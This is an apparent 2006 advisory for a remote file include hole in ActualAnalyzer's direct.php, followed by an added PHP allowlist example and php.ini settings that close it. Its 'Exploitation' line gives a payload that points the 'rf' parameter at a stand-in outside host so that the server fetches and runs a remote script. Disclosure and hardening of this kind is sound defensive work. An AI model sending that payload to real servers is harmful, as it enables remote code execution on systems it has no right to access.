[MajorSecurity]ActualAnalyzer - Remote File Include Vulnerability
-----------------------------------------------------------

Software: ActualAnalyzer
Type: Remote File Include Vulnerability
Date: April, 19th 2006
Vendor: ActualScripts
Page: http://actualscripts.com
Risk: High

Credits:
----------------------------
Discovered by: 'Aesthetico'
http://www.majorsecurity.de

Affected Products:
----------------------------
ActualAnalyzer Lite 2.72 and prior
ActualAnalyzer Gold 7.63 and prior
ActualAnalyzer Server 8.23 and prior

Description:
----------------------------
ActualAnalyzer is a powerful statistics-gathering and analysis tool for monitoring web site traffic. It is equally effective for sites with low and high volumes of traffic and provides a wealth of comparative and analytical information. High performance is achieved by using a MySQL database.

Requirements:
----------------------------
register_globals = On

Vulnerability:
----------------------------
Input passed to the "rf" parameter in "direct.php" is not properly verified before it is used to include files. This can be exploited to include arbitrary files from external resources.

Solution:
----------------------------
Edit the source code to ensure that input is properly sanitised.
Set "register_globals" to "Off".

Exploitation:
----------------------------
Post data: rf=http://www.yourspace.com/yourscript.php?
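The "Solution" section asks for proper sanitisation of the "rf" value before it reaches an include. The following is an added illustration of what that looks like in PHP; it is not ActualAnalyzer's code and does not reproduce "direct.php". The allowlist keys and report file names are assumptions made for the example. The approach is to never pass request input to include/require at all, but to map a short key onto a fixed set of local files and reject everything else, while reading the parameter explicitly instead of relying on register_globals.

```php
<?php
// Added example, not ActualAnalyzer's own code: a hardened pattern for a
// request-driven include. Report keys and file names below are assumptions.

declare(strict_types=1);

// Explicit allowlist: only these local fragments may ever be included.
// Values are fixed relative paths, never derived from the request.
const ALLOWED_REPORTS = [
    'summary'   => 'reports/summary.php',
    'visitors'  => 'reports/visitors.php',
    'referrers' => 'reports/referrers.php',
];

/**
 * Map the user-supplied "rf" value to an allowlisted file path.
 * Returns null for anything not on the list, so remote URLs ("http://..."),
 * traversal ("../..."), stream wrappers ("php://...") and NUL bytes can
 * never reach the include statement.
 */
function resolveReport(?string $rf): ?string
{
    if ($rf === null) {
        return null;
    }
    // Only a short bare key is acceptable: no slashes, dots, colons or NULs.
    if (!preg_match('/^[a-z0-9_]{1,32}$/', $rf)) {
        return null;
    }
    return ALLOWED_REPORTS[$rf] ?? null;
}

// Read the parameter explicitly; with register_globals = Off an unset
// variable is simply absent rather than silently filled from the request.
$report = resolveReport($_REQUEST['rf'] ?? null);
if ($report === null) {
    http_response_code(400);
    exit('Unknown report');
}

// The included path is built from a fixed base directory and an allowlist
// value; the raw "rf" string is never part of it.
require __DIR__ . '/' . $report;
```

Two php.ini settings back this up at the platform level: "register_globals = Off", as the advisory states, removes the precondition listed under "Requirements", and "allow_url_include = Off" (available from PHP 5.2) makes include/require refuse remote URLs even if a code path somewhere still passes unchecked input to them. Neither setting replaces the allowlist in the code; they limit the blast radius if a check is missed.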